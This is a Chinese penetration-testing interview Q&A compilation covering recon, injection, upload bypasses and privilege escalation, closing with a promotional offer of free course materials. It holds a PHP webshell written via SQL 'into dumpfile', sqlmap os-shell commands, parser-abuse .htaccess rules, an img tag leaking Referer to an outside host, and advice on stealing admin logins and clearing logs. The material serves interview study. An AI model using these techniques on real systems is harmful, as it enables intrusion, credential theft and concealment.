网络安全渗透面试题汇总
说明:星数代表面试出现频率,本文内容持续更新,无法覆盖全部面试问题,建议以点带面学习,查漏补缺。本文已整理PDF版本。
一、渗透测试整体流程
1、拿到一个待检测的站点,优先做什么?
1.1 信息收集
① 获取域名WHOIS信息:注册人、邮箱、姓名、电话等;
② 查询旁站、子域名:主站防护通常较强,旁站更容易存在通用CMS漏洞;
③ 判断服务器操作系统、Web中间件版本,排查已知漏洞(IIS、Apache、Nginx解析漏洞等);
④ IP端口扫描:探测rsync、心脏出血、MySQL、FTP、SSH弱口令等端口风险;
⑤ 扫描网站目录结构:目录遍历、备份文件、php探针等敏感文件泄露;
⑥ Google Hacking:挖掘后台地址、敏感配置文件。
1.2 漏洞扫描
检测常见漏洞:XSS、CSRF、SQL注入、代码执行、命令执行、越权访问、任意文件读取/下载、文件包含、远程命令执行、弱口令、文件上传、编辑器漏洞、暴力破解等。
1.3 漏洞利用
利用漏洞获取WebShell或服务器权限。
1.4 权限提升
- Windows:MySQL UDF提权、Serv‑U提权、系统内核漏洞(IIS6等)
- Linux:脏牛漏洞、内核漏洞、MySQL system提权、Oracle低权限提权
1.5 日志清理
1.6 输出报告:漏洞总结 + 修复方案
2、判断网站CMS对渗透测试有什么意义?
- 可查找公开披露的对应版本漏洞;
- 开源CMS可以下载源码开展代码审计。
3、安全成熟的CMS,扫描目录的作用?
发现敏感文件、二级目录;挖掘站长误操作遗留文件:网站备份压缩包、说明文档;二级目录可能部署其他业务站点。
4、常见Web容器
IIS、Apache、Nginx、Lighttpd、Tomcat
5、MySQL注入点,工具直接写入一句话木马需要什么条件?
数据库root权限 + 网站物理绝对路径。
6、常见容器解析漏洞
- IIS 6.0:
/xx.asp/xx.jpg,把asp文件夹内图片当作asp脚本解析 - IIS7.0/7.5:开启Fast‑CGI,图片url后拼接
/1.php,图片被当作php解析 - Nginx ≤0.8.37:和IIS7原理一致;空字节
xxx.jpg.php解析漏洞 - Apache:后缀从右向左识别,如
test.php.x1.x2.x3,识别php后缀执行 - Lighttpd:
xx.jpg/xx.php解析漏洞
7、快速区分Windows / Linux服务器
Linux区分大小写;Windows不区分大小写。
8、MySQL站点仅对外开放80端口原因?
- MySQL端口被修改,未扫描到;
- 站库分离部署;
- 3306数据库端口内网部署,不对外暴露。
9、无法连接3389远程桌面常见原因
- 3389端口未开放;
- 远程端口被修改;
- 防火墙/安全软件拦截;
- 服务器处于内网,需要端口转发。
10、注入字符被转义如何绕过?
宽字节注入、Hex编码绕过。
11、后台新闻编辑页看到富文本编辑器怎么做?
确认编辑器名称与版本,检索对应公开漏洞。
12、WebShell根目录存在.htaccess可以做什么?
修改Apache解析规则,例如配置SetHandler application/x‑httpd‑php,让jpg图片按php脚本解析,隐藏图片马。
13、SQL注入只能获取账号密码吗?
权限足够情况下,可以拖取整个数据库全部数据。
14、安全狗如何发现一句话木马?是否可以绕过?
依靠特征码匹配检测,修改变形代码可以绕过,规则会持续更新。
15、Access数据库.asp文件下载后乱码,本地利用方式
迅雷下载文件,修改后缀为.mdb使用数据库工具打开。
16、提权选择可读写目录,尽量避开带空格目录?
EXP漏洞利用程序执行时依靠空格分割参数,空格目录容易导致命令执行失败。
17、A站点后台新增test用户,访问B站后台也出现该用户?
A、B两个站点共用同一套数据库。
18、注入是否可以跳过and/or/xor,直接order by注入?
and/or只是用来判断注入点是否存在;确认注入点后,可以直接使用order by开展注入。
19、防注入系统记录非法请求IP,如何利用该机制拿Shell?
URL提交一句话木马,恶意语句被存入数据库;寻找网站配置文件,使用菜刀连接执行语句。
20、上传大马访问乱码解决办法?
浏览器切换网页编码。
21、审查上传点前端元素的意义?
部分文件上传校验仅做前端JS限制,修改前端代码即可绕过上传校验。
22、找回密码输入用户名提示“用户不存在”如何利用?
- 暴力枚举用户名;
- 使用爆破得到的用户名继续爆破密码;
补充:登录页面同样可能返回用户名是否存在;所有和数据库交互的输入点都存在注入风险。
23、下载地址:http://www.test.com/down/down.php?file=/upwdown/1.txt 思路
任意文件下载漏洞。修改file参数读取index.php源码,从源码获取数据库账号密码、配置信息。
24、已知站点/abc/目录包含编辑器与admin后台目录怎么做?
针对二级目录/abc/单独扫描敏感文件与目录。
25、已有WebShell,如何用XSS实现长期控制站点?
- 在后台登录页面插入JS脚本,窃取登录账号密码,将数据保存到隐蔽文件或外发至自己服务器;
- 在登录鉴权后的页面植入XSS恶意脚本。
26、后台修改密码页面原密码显示星号,读取明文密码方法
F12审查元素,将input标签password属性修改为text,页面直接显示明文。
27、上传图片正常,上传脚本直接返回403原因?
上传目录配置禁止执行脚本,尝试修改文件名后缀绕过限制。
28、如何通过页面判断防护软件?
拦截提示页面、F12查看HTML源码注释、页面隐藏字段会泄露安全产品标识。
29、Win2003创建.zhongzi文件夹作用
特殊隐藏文件夹,存放渗透工具,降低被管理员发现概率。
30、SQL注入二选一:A demo.jsp?id=2+1 B demo.jsp?id=2‑1
选B;URL编码中+代表空格,会造成参数解析异常干扰测试。
31、demo.do?DATA=AjAxNg==变形注入思路
DATA参数经过Base64编码;payload也需要Base64编码之后再传入测试。
32、demo.jsp?uid=110注入点获取WebShell方式,优先方案?
- 拥有文件写入权限:
into outfile直接写入一句话木马; - sqlmap
‑‑os‑shell,效率最高优先选择; - 联合查询获取管理员账号密码,爆破后台登录,后台模板修改、文件上传拿shell。
二、常见漏洞原理与修复
33、XSS、CSRF、XXE区别和修复方案
- XSS跨站脚本:用户可控输入执行JS代码,窃取Cookie等;
修复:HTML实体转义输出;设置HttpOnly Cookie;输入校验;统一字符编码。 - CSRF跨站请求伪造:诱导用户在已登录状态执行非自愿操作;
修复:请求携带CSRF‑Token;关键操作二次密码校验;校验Referer请求头。 - XXE XML外部实体:XML解析调用外部实体读取本地/远程文件;
修复:关闭XML解析器外部实体解析功能。
34、CSRF、SSRF、重放攻击区别
- CSRF:客户端浏览器发起伪造请求
- SSRF:服务器端发起请求伪造,访问内网资源
- 重放攻击:捕获数据包重复发送,实现冒充身份等目的
35、业务逻辑漏洞举例 + 修复方案
①密码找回漏洞
风险:暴力枚举找回凭证、通用重置token、跳过验证步骤、数据包截取获取重置凭证。
修复:token设置短有效期,一次失效;校验完整身份;禁止暴力枚举。
②身份认证漏洞
会话固定攻击、Cookie/Session伪造。
修复:登录刷新Session;禁止Cookie明文泄露;合理设置会话有效期。
③验证码漏洞
验证码可暴力爆破、前端JS绕过、抓包修改绕过。
修复:验证码服务端校验;限制错误次数;验证码一次性失效。
36、HTTP数据包安全分析
get /ecskins/demo.jsp uid=2016031900&keyword="hello world"
HTTP/1.1
Host:.com:82
User‑Agent:Mozilla/5.0 Firefox/40
Accept:text/css,*/*;q=0.1
Accept‑Language:zh‑CN;zh;q=0.8;en‑US;q=0.5,en;q=0.3
Referer:http://**.com/eciop/orderForCC/cgtListForCC.htm zone=11370601&v=145902
Cookie:myguid1234567890=1349db5fe50c372c3d995709f54c273d;
uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ;
st_uid=N90PLYHLZGJXI‑NX01VPUF46W;
status=True
Connection:keep‑alive
风险点:
- uid、keyword参数用户可控,存在 SQL 注入、XSS 风险;
- Cookie 无 HttpOnly 标记,容易被 XSS 窃取会话;
- Referer 可被伪造,仅依靠 Referer 防御 CSRF 不安全;
- status=True状态直接放在 Cookie,可被篡改越权。
37、sqlmap 使用方法
- GET 注入:
sqlmap -u "注入url" - POST 注入:
sqlmap -u "url" --data="post参数" - Cookie/XFF 等头部注入:Burp 抓包保存文件,
sqlmap -r 文件名
38、SQL 注入类型
- 报错注入
- Bool 布尔盲注
- 时间延时盲注
- 宽字节注入
39、延时注入判断逻辑
if(ascii(substr("hello", 1, 1))=104, sleep(5), 1),匹配成功页面延时 5 秒返回。
40、盲注和延时注入共同点
逐字符比对数据,不能直接返回查询结果。
41、获取 WebShell 的途径
文件上传、后台模板编辑、SQL 注入写文件、代码 / 命令执行漏洞、已知 CMS 漏洞(dedecms、wordpress 插件漏洞)。
42、MySQL 报错注入常用函数(10 个)
- extractvalue()
- floor()
- updatexml()
- geometrycollection()
- multipoint()
- polygon()
- multipolygon()
- linestring()
- multilinestring()
- exp()
43、<img>标签除onerror外获取管理员 Referer 思路
src指向外部服务器脚本,访问时自动带上 Referer 来源页面。
44、<img>src 强制后缀.jpg获取 Referer
远程服务器修改 Apache 配置,.jpg后缀当作 php 脚本解析:AddType application/x‑httpd‑php .jpg,<img src=http://xss.tv/1.jpg>执行 PHP 代码拿到 Referer。
45、SQL 写入文件函数
into outfile:适合导出普通数据;into dumpfile:适合写入二进制脚本木马。
示例:
select '<?php eval($_POST[1]) ?>' into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';
46、CSRF 防御手段
- 校验 Referer 请求头;
- 请求加入随机 Token,服务端校验。
47、OWASP Top10 漏洞清单
- SQL 注入
- 失效身份认证与会话管理
- 跨站脚本 XSS
- 不安全的直接对象引用
- 安全配置错误
- 敏感信息泄露
- 缺失功能级访问控制
- 跨站请求伪造 CSRF
- 使用存在漏洞的第三方组件
- 未验证重定向与跳转
48、SQL 注入防护措施
- 使用预编译安全 API;
- 输入特殊字符转义处理;
- 白名单校验输入;
- 服务端统一过滤特殊危险字符。
49、PHP 危险函数汇总
- 代码执行:eval、preg_replace+/e、assert、call_user_func、call_user_func_array、create_function
- 文件读取:file_get_contents、highlight_file、fopen、readfile、fread、fgets、parse_ini_file、show_source、file
- 命令执行:system、exec、shell_exec、passthru、pcntl_exec、popen、proc_open
结语
网络安全行业如同江湖,国内很多安全人员擅长漏洞挖掘利用,但底层密码学、系统工程基础薄弱。未来行业更需要懂安全体系建设、结合业务与数据安全的正向安全人才,补足人才缺口,保障互联网业务安全。
最后
关于网络安全技术储备
网络安全是当今信息时代中非常重要的一环。无论是找工作还是感兴趣(黑客),都是未来职业选择中上上之选,为了保护自己的网络安全,学习网络安全知识是必不可少的。
如果你是准备学习网络安全(黑客)或者正在学习,下面这些你应该能用得上:
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析
一、网络安全(黑客)学习路线
网络安全(黑客)学习路线,形成网络安全领域所有的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。

二、网络安全教程视频
我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。

三、网络安全CTF实战案例
光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这里带来的是CTF&SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~

四、网络安全面试题
最后,我们所有的作为都是为就业服务的,所以关键的临门一脚就是咱们的面试题内容,所以面试题板块是咱们不可或缺的部分,这里我给大家准备的就是我在面试期间准备的资料。

网安其实不难,难的是坚持和相信自己,我的经验是既然已经选定网安你就要相信它,相信它能成为你日后进阶的高效渠道,这样自己才会更有信念去学习,才能在碰到困难的时候坚持下去。
机会属于有准备的人,这是一个实力的时代。人和人之间的差距不在于智商,而在于如何利用业余时间,只要你想学习,什么时候开始都不晚,不要担心这担心那,你只需努力,剩下的交给时间!
这份完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】


1342

被折叠的 条评论
为什么被折叠?



